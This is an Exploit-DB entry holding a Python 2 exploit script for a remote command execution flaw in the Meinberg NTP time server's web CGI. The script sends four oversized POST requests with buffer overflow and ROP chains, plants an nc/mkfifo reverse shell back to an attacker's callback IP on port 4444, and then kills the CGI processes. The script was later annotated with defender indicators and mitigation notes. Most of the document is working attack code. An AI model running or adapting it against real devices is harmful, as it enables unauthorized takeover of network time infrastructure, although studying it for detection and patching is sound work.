
Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges

17 Jul 2016 00:00:00 — Reported by b0yd — Type: exploitdb


#!/usr/bin/python
#
# EDB Note: Source ~ https://github.com/securifera/CVE-2016-3962-Exploit
# EDB Note: More info ~ https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/
#
# 271 - trigger notifications
# 299 - copy user defined notifications

# Kernel Version: 2.6.15.1
# System Version: 530 
# Lantime configuration utility 1.27
# ELX800/GPS M4x V5.30p

import socket
import struct
import telnetlib
import sys
import time

# Python 2 script (print statements; str and struct.pack output are
# concatenated directly) -- it does not run unmodified under Python 3.
#
# Shape of the script: four separate TCP connections to <Host>:80, each
# carrying one raw HTTP/1.1 POST to /cgi-bin/main whose body is a
# "button=" parameter of roughly 10 KB of filler followed by packed 32-bit
# values, with a one-second pause between stages.  For defenders that is
# the network signature: an oversized "button" parameter to /cgi-bin/main
# (Content-Length above ~10 KB) repeated four times from one source within
# a few seconds.  Host-side indicators named in this script: /www/filetmp
# being created, /mnt/flash/config/user_defined_notification being copied
# over (per the author's stage comments), an outbound TCP connection to
# port 4444 on the callback address, and "main" processes being killed.
# Mitigation: the vendor fix referenced in the header, plus keeping the
# appliance's web management interface off untrusted networks and egress-
# filtering the appliance so it cannot open arbitrary outbound connections.
if len(sys.argv) < 3:
	print "[-] <Host> <Callback IP> "
	exit(1)

	
host = sys.argv[1]
callback_ip = sys.argv[2]

# Banner names an "M400"; the header comments name ELX800/GPS M4x V5.30p.
print "[+] exploiting Meinburg M400"
port = 80   # plain HTTP; every stage below reconnects to host:port

###################################################################
#
# Stage 1 (author's description): copy user_defined_notification to
# /www/filetmp, then append the reverse-shell string to /www/filetmp.
#
# What is visible here: the POST body is "button=" + 10028 filler bytes,
# three native-order 32-bit values (struct "I") and a NUL-terminated shell
# command string.  The three values are absolute, hard-coded addresses,
# so the chain presumes a fixed-layout target binary -- TODO confirm
# against the firmware named in the header.
#
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )

param = "A" * 0x2850   # assigned in every stage, never referenced

resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"

# Hard-coded absolute addresses.  Note that `exit` is rebound to an int
# here, shadowing the builtin `exit` used in the argument check above.
system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8

#must have a listener setup to receive the callback connection on ip 192.168.60.232
# i.e. nc -v -l -p 4444
# Defender view: the resulting connection is outbound from the appliance
# to TCP/4444 on the callback address; an egress rule on the management
# network blocks it and a NetFlow/IDS alert on new outbound connections
# from the time server catches it.
command = 'cp /mnt/flash/config/user_defined_notification /www/filetmp; echo "{rm,/tmp/foo};{mkfifo,/tmp/foo};/bin/bash</tmp/foo|{nc,' + callback_ip +'0,4444}>/tmp/foo;" >> /www/filetmp'

# Body layout: form field name, 10028 bytes of filler, three packed
# addresses, then the command string with a terminating NUL.
msg = "button=" + "A"*10028 
msg += struct.pack("I", system )
msg += struct.pack("I", exit )
msg += struct.pack("I", some_str )
msg += command + "\x00"

resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg
csock.send(resp)
csock.close()

time.sleep(1)

###################################################################
#
# Stage 2 (author's description): copy /www/filetmp back to
# user_defined_notification.
#
# This stage is a gadget chain rather than a direct call: the inline
# annotations on the packed values below are the author's descriptions of
# each gadget (pop eax; add dword ptr [eax+0x60], ebp; a "mov esp, ebp ; ret"
# stack pivot).  Same 32-bit, fixed-address assumption as stage 1.
#
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )

param = "A" * 0x2850   # unused, as in stage 1

resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"

# Hard-coded absolute addresses (same values re-assigned in every stage).
send_cmd = 0x807ED88
system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8
ret = 0x804CE65

#stack pivot
stack_pivot = 0x8049488
msg = "button=" + "A" * 9756   # shorter filler than stage 1: 9756 + 28 bytes

msg += "B" * 28
msg += struct.pack("I", 0x7FFEE01A )       # ebp
msg += struct.pack("I", 0x0804ce64 )       # pop eax ; ret
msg += struct.pack("I", some_str - 0x100 ) # some place
msg += struct.pack("I", 0x080855cc )       # add dword ptr [eax + 0x60], ebp ; ret
msg += struct.pack("I", 0x080651d4 )       # inc dword ptr [ebx + 0x566808ec] ; ret
# 71/4 is integer division under Python 2, i.e. 17 copies of `ret`;
# under Python 3 this expression would be a float and fail.
msg += struct.pack("I", ret ) * (71/4)

msg += struct.pack("I", send_cmd )
msg += struct.pack("I", exit )
msg += struct.pack("I", 0x80012111 )       # [eax + 0x60]
msg += struct.pack("I", some_str )         # buffer
msg += struct.pack("I", 0xffffffff )       # count
msg += "E" * 120

msg += struct.pack("I", 0xB1E8B434 )   # ebx
msg += struct.pack("I", some_str - 100 )   # esi
msg += struct.pack("I", some_str - 100 )   # edi
msg += struct.pack("I", some_str - 0x100 ) # ebp
msg += struct.pack("I", stack_pivot )      # mov esp, ebp ; ret
msg += "A" * 100

resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg
csock.send(resp)
csock.close   # attribute reference only -- close() is not called in this stage

time.sleep(1)

###################################################################
#
# Stage 3 (author's description): trigger the reverse shell.
#
# Byte-for-byte the same chain as stage 2 except for the value annotated
# "[eax + 0x60]" (0x800120f5 here versus 0x80012111 in stage 2).
#
	
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )

param = "A" * 0x2850   # unused

resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"

send_cmd = 0x807ED88
system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8
ret = 0x804CE65

#stack pivot
stack_pivot = 0x8049488
msg = "button=" + "A" * 9756

msg += "B" * 28
msg += struct.pack("I", 0x7FFEE01A )       # ebp
msg += struct.pack("I", 0x0804ce64 )       # pop eax ; ret
msg += struct.pack("I", some_str - 0x100 ) # some place
msg += struct.pack("I", 0x080855cc )       # add dword ptr [eax + 0x60], ebp ; ret
msg += struct.pack("I", 0x080651d4 )       # inc dword ptr [ebx + 0x566808ec] ; ret
msg += struct.pack("I", ret ) * (71/4)     # Python 2 integer division: 17 copies

msg += struct.pack("I", send_cmd )
msg += struct.pack("I", exit )
msg += struct.pack("I", 0x800120f5 )       # [eax + 0x60]  (only difference from stage 2)
msg += struct.pack("I", some_str )         # buffer
msg += struct.pack("I", 0xffffffff )       # count
msg += "E" * 120

msg += struct.pack("I", 0xB1E8B434 )   # ebx
msg += struct.pack("I", some_str - 100 )   # esi
msg += struct.pack("I", some_str - 100 )   # edi
msg += struct.pack("I", some_str - 0x100 ) # ebp
msg += struct.pack("I", stack_pivot )      # mov esp, ebp ; ret
msg += "A" * 100

resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg
csock.send(resp)
csock.close()

time.sleep(1)


print "[+] cleaning up"
###################################################################
#
# Stage 4 (author's description): kill all "main" CGI processes that are
# hung up.  Same body layout as stage 1 with a different command string.
# Host-side, a burst of "main" processes terminated by SIGTERM right after
# the oversized POSTs is the corresponding indicator.
#
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )

param = "A" * 0x2850   # unused

resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"

system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8

command = 'killall main'

msg = "button=" + "A"*10028 
msg += struct.pack("I", system )
msg += struct.pack("I", exit )
msg += struct.pack("I", some_str )
msg += command + "\x00"

resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg
csock.send(resp)
csock.close()

print "[+] enjoy"
